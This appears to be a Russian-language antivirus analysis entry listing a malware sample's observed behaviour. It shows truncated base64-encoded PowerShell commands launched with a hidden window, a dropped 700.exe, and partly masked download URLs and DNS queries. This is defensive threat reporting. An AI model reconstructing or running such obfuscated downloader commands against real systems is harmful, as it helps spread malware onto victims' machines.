Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1640
- %TEMP%\1080837.cvr
- %HOMEPATH%\700.exe
- %HOMEPATH%\700.exe
- http://lo###pelis.org/vizvx/JAmJ4u0RN/
- http://lo###pelis.org/cgi-sys/suspendedpage.cgi
- http://gr###cruzco.com/azk/r1tikt/
- DNS ASK mo###aimpex.com
- DNS ASK lo###pelis.org
- DNS ASK gr###cruzco.com
- DNS ASK bi#.ly
- DNS ASK co######esticappliances.com
- DNS ASK st####nlocked.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...' (со скрытым окном)